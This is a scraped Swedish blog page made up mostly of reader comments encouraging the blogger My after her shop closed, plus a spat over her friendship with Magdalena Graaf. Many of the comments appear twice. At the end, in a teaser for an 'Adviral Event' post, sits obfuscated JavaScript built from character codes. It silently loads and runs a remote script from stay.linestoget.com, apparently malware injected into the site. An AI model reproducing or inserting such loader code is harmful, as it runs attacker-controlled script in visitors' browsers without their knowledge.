kvar företaget, att återhämta dig. Du kommer att fixa det här, ha tålamod <3

 44. Styrka till dig…skönt att se att du har fina vänner
  Kan det ha med pengar att göra med de som vält sig ryggen till…

 45. Vad härligt att det kommer någon och ger positiv energi, det behövs! Jag har varit i liknande sits och jag är övertygad om att du sakta men säkert kommer att resa dig ur det här ännu starkare. Men, precis som du beskriver, man måste tillåta sig att bryta ihop. Men sakta men säkert kommer du komma steg för steg närmare ditt rätta jag igen. Låt det ta tid och gör saker du mår bra av! Hoppas du kan njuta av sommaren trots denna dåliga start den fick. Kram!

 46. Jag blir rörd när jag läser om din vän Annelie, mannen som tankade till dig. Man blir varm i hjärtat! Underbar vän som hjälper dig! My du är stark och kommer igen med lite hjälp! Du är entreprenör och driven tjej! Ha tålamod! Efter regn kommer sol : ) Glöm inte att ta hand om dig , Ludvig och Tezz.
  Många kramar med energi
  Kram C

 47. Så glada muggar och ritsaker med mening o omsorg, blir själv tårögd!:))) Till och med fikat var färgglatt , var inte hård mot dig:))Fint att leverantörer börjar höra av sig med värme:))

 48. Hej! Vad har hänt med din och Magdalena Graaf vänskap?
  Ni var ju oskiljaktiga innan hon for till Spanien … hon var ju som en syster har du sagt flera gånger. Har inte sett ett enda inlägg om er vänskap på jättelänge.
  Vad hände?
  Har även skickat kommentarer på hennes blogg men hon tar bort den, den publiceras inte då jag vet inte om det är ett ”känsligt ämne” för er båda?
  Kram Malin.

  • Men Malin varför hålla på och fråga om det? Vad tror du själv, lite måste du kunna tänka själv…sen har vi inte med att göra om det handlar om pengar eller skitsnack bakom rygg eller vad det handlar om…My har Magdalena att tacka för mycket…men My har andra vänner och en stor blogg så många nya vänner lär komma och My kommer säkert klara sig alldeles utmärkt i framtiden.

   • ”Hålla på” jag har frågat en gång på Mys blogg och en gång på Maggans!
    Anledningen är INTE NYFIKENHET som ni alla syniska elaka personer ”LIA OCH ANDREA” jag frågade bara för jag tyckte att deras vänskap var så himla genuin och fin – som MY SJÄLV SKREV FLERA FLERA GÅNGER om själv. Man är liksom van att läsa om deras bravader och deras ”systerliga vänskap” så det är fullt naturligt att man frågar en sådan sak!!!
    Inte nyfiken men inget fel att undra eftersom detta var en stor del av Mys blogg vänskapen med Magdalena Graaf.
    Så sluta upp med era spydiga ”jag-försvarar-my” kommentarer till mig.
    Det fanns inget motiv eller nåt elakt i min fråga, så skärp er era elaka läsare!!!

  • Malin! Du frågar Maggan och får inget svar! Har då inte tanken slagit dej att det inte angår dej alls? Nej då sätter du dej ner och frågar My istället? Såå vidrigt lågt att ” lägga eld ” på brasan av sjuk nyfikenhet på vad människor du inte ens känner gör !

   • ”Hålla på” jag har frågat en gång på Mys blogg och en gång på Maggans!
    Anledningen är INTE NYFIKENHET som ni alla syniska elaka personer ”LIA OCH ANDREA” jag frågade bara för jag tyckte att deras vänskap var så himla genuin och fin – som MY SJÄLV SKREV FLERA FLERA GÅNGER om själv. Man är liksom van att läsa om deras bravader och deras ”systerliga vänskap” så det är fullt naturligt att man frågar en sådan sak!!!
    Inte nyfiken men inget fel att undra eftersom detta var en stor del av Mys blogg vänskapen med Magdalena Graaf.
    Så sluta upp med era spydiga ”jag-försvarar-my” kommentarer till mig.
    Det fanns inget motiv eller nåt elakt i min fråga, så skärp er era elaka läsare!!!

 49. Men vad det ska tjatas i kommentarerna om vänskapen mellan någon hit och dit. Tids nog kanske My berättar vad som hänt. Ge er till tåls.

 50. Vad härligt att det kommer någon och ger positiv energi, det behövs! Jag har varit i liknande sits och jag är övertygad om att du sakta men säkert kommer att resa dig ur det här ännu starkare. Men, precis som du beskriver, man måste tillåta sig att bryta ihop. Men sakta men säkert kommer du komma steg för steg närmare ditt rätta jag igen. Låt det ta tid och gör saker du mår bra av! Hoppas du kan njuta av sommaren trots denna dåliga start den fick. Kram!

 51. Jag blir rörd när jag läser om din vän Annelie, mannen som tankade till dig. Man blir varm i hjärtat! Underbar vän som hjälper dig! My du är stark och kommer igen med lite hjälp! Du är entreprenör och driven tjej! Ha tålamod! Efter regn kommer sol : ) Glöm inte att ta hand om dig , Ludvig och Tezz.
  Många kramar med energi
  Kram C

 52. Jag är övertygad om att du är stark My. Du har redan gått igenom så mycket i ditt liv. Du kommer att fixa detta också. Det kanske inte går i det tempot som du vill, men det kommer att lösa sig.
  Många kramar.

 53. Så glada muggar och ritsaker med mening o omsorg, blir själv tårögd!:))) Till och med fikat var färgglatt , var inte hård mot dig:))Fint att leverantörer börjar höra av sig med värme:))

 54. Hej! Vad har hänt med din och Magdalena Graaf vänskap?

  Ni var ju oskiljaktiga innan hon for till Spanien … hon var ju som en syster har du sagt flera gånger. Har inte sett ett enda inlägg om er vänskap på jättelänge.

  Vad hände?

  Har även skickat kommentarer på hennes blogg men hon tar bort den, den publiceras inte då jag vet inte om det är ett ”känsligt ämne” för er båda?

  Kram Malin.

  • Men Malin varför hålla på och fråga om det? Vad tror du själv, lite måste du kunna tänka själv…sen har vi inte med att göra om det handlar om pengar eller skitsnack bakom rygg eller vad det handlar om…My har Magdalena att tacka för mycket…men My har andra vänner och en stor blogg så många nya vänner lär komma och My kommer säkert klara sig alldeles utmärkt i framtiden.

   • ”Hålla på” jag har frågat en gång på Mys blogg och en gång på Maggans!

    Anledningen är INTE NYFIKENHET som ni alla syniska elaka personer ”LIA OCH ANDREA” jag frågade bara för jag tyckte att deras vänskap var så himla genuin och fin – som MY SJÄLV SKREV FLERA FLERA GÅNGER om själv. Man är liksom van att läsa om deras bravader och deras ”systerliga vänskap” så det är fullt naturligt att man frågar en sådan sak!!!

    Inte nyfiken men inget fel att undra eftersom detta var en stor del av Mys blogg vänskapen med Magdalena Graaf.

    Så sluta upp med era spydiga ”jag-försvarar-my” kommentarer till mig.

    Det fanns inget motiv eller nåt elakt i min fråga, så skärp er era elaka läsare!!!

  • Malin! Du frågar Maggan och får inget svar! Har då inte tanken slagit dej att det inte angår dej alls? Nej då sätter du dej ner och frågar My istället? Såå vidrigt lågt att ” lägga eld ” på brasan av sjuk nyfikenhet på vad människor du inte ens känner gör !

   • ”Hålla på” jag har frågat en gång på Mys blogg och en gång på Maggans!

    Anledningen är INTE NYFIKENHET som ni alla syniska elaka personer ”LIA OCH ANDREA” jag frågade bara för jag tyckte att deras vänskap var så himla genuin och fin – som MY SJÄLV SKREV FLERA FLERA GÅNGER om själv. Man är liksom van att läsa om deras bravader och deras ”systerliga vänskap” så det är fullt naturligt att man frågar en sådan sak!!!

    Inte nyfiken men inget fel att undra eftersom detta var en stor del av Mys blogg vänskapen med Magdalena Graaf.

    Så sluta upp med era spydiga ”jag-försvarar-my” kommentarer till mig.

    Det fanns inget motiv eller nåt elakt i min fråga, så skärp er era elaka läsare!!!

 55. Men vad det ska tjatas i kommentarerna om vänskapen mellan någon hit och dit. Tids nog kanske My berättar vad som hänt. Ge er till tåls.

 56. Det verkar finnas en del av dina läsare som har hakat upp sig på dina vänskapsrelationer och toftbys namn nämns ideligen, som om hon vore ett problem för dig? Det står ju klart och tydligt i din blogg att du har betydligt viktigare saker att ta hand om än att fokusera på annat löst folk. Men men, det verkar finnas rätt många som vill se intriger och försöker trigga dig att svara på något för att sedan få ruljansen att rulla igång. Gå inte på den, fortsätt som nu och ignorera ? Låt dessa nyfikna klottra ner toftbys och graafarnas kommentarsfält istället. Fokus ligger ju hos familj och vänner, inte andra obetydliga personer , hur svårt är det att förstå det? Ha nu en fin helg!

 57. Vilken fin vän Annelie är. Jag blev så kär i korgen med pussmunnen så nu har jag beställt en. Jag kommer att tänka på dig varje gång jag använder den.
  Kram

 58. Jag är övertygad om att du är stark My. Du har redan gått igenom så mycket i ditt liv. Du kommer att fixa detta också. Det kanske inte går i det tempot som du vill, men det kommer att lösa sig.
  Många kramar.

 59. Det verkar finnas en del av dina läsare som har hakat upp sig på dina vänskapsrelationer och toftbys namn nämns ideligen, som om hon vore ett problem för dig? Det står ju klart och tydligt i din blogg att du har betydligt viktigare saker att ta hand om än att fokusera på annat löst folk. Men men, det verkar finnas rätt många som vill se intriger och försöker trigga dig att svara på något för att sedan få ruljansen att rulla igång. Gå inte på den, fortsätt som nu och ignorera 🙂 Låt dessa nyfikna klottra ner toftbys och graafarnas kommentarsfält istället. Fokus ligger ju hos familj och vänner, inte andra obetydliga personer , hur svårt är det att förstå det? Ha nu en fin helg!

 60. Vilken fin vän Annelie är. Jag blev så kär i korgen med pussmunnen så nu har jag beställt en. Jag kommer att tänka på dig varje gång jag använder den.

  Kram

 61. Åh!
  Var nu stark!
  Jag kan inte förstå att du är så ung men ändå gått igenom så pass mycket! Det är ju sjukt bra gjort! Även om det nu sket sig har du större delen av livet kvar att göra andra saker som gör dig stark.
  Har knappt varit inne i butiken och fattade inte alls varför du sålde ut så blev chockad när jag fick reda på varför. Ledsen. Du verkar vara en riktigt härlig person.
  Ta hand om dig ❤️

 62. Åh!
  Var nu stark!
  Jag kan inte förstå att du är så ung men ändå gått igenom så pass mycket! Det är ju sjukt bra gjort! Även om det nu sket sig har du större delen av livet kvar att göra andra saker som gör dig stark.
  Har knappt varit inne i butiken och fattade inte alls varför du sålde ut så blev chockad när jag fick reda på varför. Ledsen. Du verkar vara en riktigt härlig person.
  Ta hand om dig ❤️

 63. Hoppas din vän läser här och förstår vilken fantastiskt fin människa hon är! Så rätt att bara komma och ta tag i allt och fixa!
  Det måste värma i hjärtat att ha henne och tänk så mycket ni måste betyda för henne<3

 64. Hoppas din vän läser här och förstår vilken fantastiskt fin människa hon är! Så rätt att bara komma och ta tag i allt och fixa!
  Det måste värma i hjärtat att ha henne och tänk så mycket ni måste betyda för henne<3

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/